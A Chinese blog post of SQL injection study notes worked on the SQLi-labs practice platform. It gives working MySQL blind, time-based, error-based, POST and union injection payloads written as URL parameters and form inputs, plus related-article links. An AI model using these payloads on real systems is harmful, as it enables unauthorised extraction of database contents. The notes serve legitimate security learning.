SQL注入学习#3

最新推荐文章于 2022-07-08 10:36:44 发布
最新推荐文章于 2022-07-08 10:36:44 发布
阅读量231 收藏
点赞数
分类专栏: SQL注入 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cloud_Player/article/details/115280988
版权

MySQL注入实例五——盲注

平台:SQli-labs

Less-5

1.基于布尔的盲注

布尔盲注理论基础(无回显通过返回真假判断数据)
https://blog.csdn.net/weixin_45146120/article/details/100104131

观察页面并寻找注入点
/?id=1
在这里插入图片描述
/?id=1’
在这里插入图片描述

用Left函数猜测数据库版本,第一位是否为1(若错误则无回显)
/?id=1’and left(version(),1)=1%23在这里插入图片描述
使用length()获取数据库长度
/?id=1%27and%20length(database())=8%23
在这里插入图片描述
使用left()判断数据库名称第一位是否大于a
/?id=1%27and%20left(database(),1)>%27a%27–+
在这里插入图片描述
使用ascii()判断第一张表首字母是否为e:
/?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101–+
在这里插入图片描述
使用regexp获取users 表中的列
/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27
在这里插入图片描述
使用ord()和mid()函数获取users 表的内容
/?id=1’ and 1=(select 1 from information_schema.columns where table_name=‘users’ and table_name regexp ‘^us[a-z]’ limit 0,1)–+
在这里插入图片描述

2.基于时间的盲注

基于时间的盲注理论基础
https://blog.csdn.net/heibaikong6/article/details/100836414

使用sleep()函数猜测数据库名
/?id=1’and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+
在这里插入图片描述

使用BENCHMARK()函数猜测数据库名
/?id=1’UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(‘MSG’,‘by 5 seconds’)),null)),2,3 FROM (select database() as current) as tb1–+
在这里插入图片描述

3.基于报错的盲注

基于报错的盲注理论基础
https://blog.csdn.net/qq_35544379/article/details/77453019

使用XPATH语法错误获取数据库版本
/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))%20–+
在这里插入图片描述
/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)%20–+
在这里插入图片描述
使用mysql重复特性猜测数据库版本号
在这里插入图片描述

  • Floor函数报错原理分析:
    如果count(*)和group by同时在SQL语句中,就会产生虚拟表;
    向虚拟表插入数据包含两个动作:1. 检查主键是否存在;2.如果不存在,就插入新主键;存在就计数加1
    如何构造主键值重复:floor(rand(0)*2)

4.POST盲注

通过对输入框进行传参,可以被带入数据库进行的查询
注入条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询

Less-11

一.post盲注概念
1.首先post盲注和get盲注一样,只是不会拼接到url中
2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等,请求数据会包含在请求体中
3.使用post方法时,查询字符在post信息中单独存在,和http请求一起发送到服务器

特点:
1.POST请求不能被缓存下来
2.POST请求不会保存在浏览器浏览记录中
3.以POST请求的URL无法保存为浏览器书签
4.POST请求没有长度限制

找到注入点
在这里插入图片描述
使用单引号闭合
在这里插入图片描述
使用union注入获取数据库名
1admin’union select 1,database()#
在这里插入图片描述
使用基于时间的盲注猜测数据库名
admin’and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&
在这里插入图片描述

5.http头部注入

参考链接:https://blog.csdn.net/weixin_45146120/article/details/100588267
原理:一般获取头部的信息用于数据分析,但是通过请求头部也可以向数据库发送查询信息,通过构造恶意语句可以对数据库进行信息查询。
条件:
1.能够对请求头消息进行修改,
2.修改的请求头信息能够带入数据库的查询
3.数据库没有对输入的请求信息做过滤

6.堆叠注入

参考链接:https://blog.csdn.net/weixin_45146120/article/details/101037211

Cl0ud_Pl4y3r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试基础-盲注(布尔盲注和时间盲注)
weixin_45488495的博客
04-09 3647
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL注入——布尔盲注,延时盲注,宽字节注入
weixin_46601374的博客
02-27 2390
什么是盲注? 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。 盲注函数 length() 函数 返回字符串的长度 ?id=1 and length(database())>1 substr() 截取字符串 , 从第一位截取一个 id=1 and substr(database(),1,1)='k' substr(内容,1,1) 显示第一个字符 ord()/ascii() 返回字符的ascii码 ..
盲注练习
MD_YAN的博客
07-24 228
1.什么时候使用盲注? 当没有任何报错信息,没有任何输出的时候,只能使用盲注 2.盲注有哪些类型? 布尔盲注 时间盲注 3.报错注入原理是什么? 在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。 4.报错注入制造函数有哪些? updatexml(),extractvalue(),floor() ,exp() 5.盲注常用的函数有哪些? 通过长度判断 length():length(database())>=
SQL注入语法类型和sql盲注
cangyu51462的博客
04-13 661
SQL注入语法类型和sql盲注
sqli-lab学习笔记(学习笔记)(1-10)
大方子
08-07 2718
经常会犯的错误: 1.在hackbar里面忘记用%23替代# 2.在用下一条语句的时候忘记更改limit的值导致结果显示不出来 3.双注入里面的语句忘记加()日志是我后来想到发的,前面几关也都基础简单的,giantbranch大佬写的挺好的很详细,我也是按他的一步步学习来的,然后在里面增加自己的知识点和内容,对他进行补充和说明 他的文章地址:http://blog.csdn.net/u012
SQL 注入天书.pdf
08-06
SQL 注入学习天书
基于Python的机器学习检测SQL注入.zip
最新发布
03-03
基于Python的机器学习检测SQL注入.zip 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 ...
渗透学习入门之SQL注入
07-31
渗透学习入门之SQL注入 SQL 注入是一种常见的Web 应用程序漏洞,攻击者通过构造恶意输入来访问或控制数据库中的数据。SQL 注入攻击通常发生在Web 应用程序使用用户输入来构建动态SQL 语句时,攻击者可以 inject ...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
WEB漏洞学习-sql注入
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
SQL注入基础学习(笔记)
部分学习记录
07-29 627
此文为自己学习SQL注入基础的笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们一点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了一个单引号,推测输入内容为单引号引起来的字
MOD (ASCII (SUBSTR ('abcd', 1, 1)), 2)
乘风晓栈的博客
12-27 882
一套连招:截取'abcd'的第一个元素转化为ASCII码取除以2的余数; select MOD (ASCII (SUBSTR ('abcd', 1, 1)), 2) from dual; 单看这几个函数很简单。。。 最近看到一个思路:linux定时,数据量巨大执行不完,在需要执行的数据库某个字段是uuid随机值, 起两个定时, 一个定时:where条件MOD (ASCII (SUBSTR...
网络安全-Mysql注入知识点
关注网络安全、云原生安全
10-08 5360
目录 注释 SQL语句 查询语句 UNION LIMIT ORDER BY information_schema SCHEMATA TABLES COLUMNS 常用函数 基本函数 盲注(字符串处理函数) 报错注入 时间盲注 本篇文章介绍sql注入时数据库是Mysql时需要掌握的知识点。以Navicat、mysql 5.7.4为例。 注释 #或--空格是单行注释 /**/是内联注释 SQL语句 查询语句 SELECT〈目标列组〉 FROM〈数据源〉 ...
SQL注入盲注利用方法
小白渣的博客
02-27 1893
靠 真大佬写的 太太太qiang 辽 !!! 前言 最近做了些基于布尔盲注和基于时间盲注的CTF题,掌握了CTF题中SQL盲注的三种解法,收获很大,于是结合题目分享一下。 BASE-Blind-Inject 题目信息 题干分析 第一次走进误区,刚看到这道题的时候看到了登录框,第一印象应该就是简单的闭合注入,测试后发现是双引号闭合,所以构造payload注入 " or 1=1# 果...
【网络安全】sql注入语法汇总
m0_72061943的博客
07-08 1370
目录一、原理二、SQL注入判断方法1.字符型检测2.数字型检测3.搜索型检测和xx型检测三、union注入1.order by判断列数2.union 联合查询四、盲注1.布尔盲注(1)查询数据库长度(2)查询当前数据库名称(3)查询数据库下有多少表(4)查询数据库下表名第一位(5)查询数据库下表中有多少个字段(6)判断数据库下表中的第一个字段的长度(7)查询数据库下表里面的第一个字段的第一位是多少(8)得到字段探测第一条数据2.时间盲注(1)判断是否存在延迟函数(2)查询当前数据库的长度,如果正确那么就延迟
SQL注入漏洞基础拓展
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-11 377
文章目录一、SQL盲注1、基于布尔的盲注2、基于时间的盲注二、SQL漏洞基础 防范措施1、代码层2、网络层防护 一、SQL盲注 在有些情况下,应用查询后台使用了错误消息屏蔽方法(比如@)屏蔽了报错, 此时无法再根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注” 根据表现形式的不同,盲注又分为based boolean和based time两种类型。 1、基于布尔的盲注 主要表现: 没有报错信息 不管输入是否正确,都只显示两种情况(可以认为是0或者1) 在正确的输入下,输入and 1=1/and
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3838
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
sqli-labs(1)
weixin_30239339的博客
05-16 84
0x01字符注入 今天是第一天的学习sqli-labs Lesson1:字符型注入 首先测试一下 ' 发现报错 然后 ''发现 不报错 这种大概率就是字符注入了 接下来我们进行列查询 查询语句 http://127.0.0.1/sql1/Less-1/?id=1%27%20order%20by%204%23 发现列数是3 这里后面之所以要用%23是因为这里我们的url...
Charles#1
Cloud_Player的博客
06-13 646
Charles 基础知识 Charles is an HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet. This includes requests, responses and the HTTP headers (which contain the
关于SQL注入学习方式
05-26
3. 学习如何使用工具进行SQL注入测试,如SQLMap、Burp Suite等,掌握工具的使用方法和一些基本配置。 4. 学习如何防止SQL注入,包括使用参数化查询、过滤输入、使用ORM框架等方法。 5. 实践漏洞挖掘和修复,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值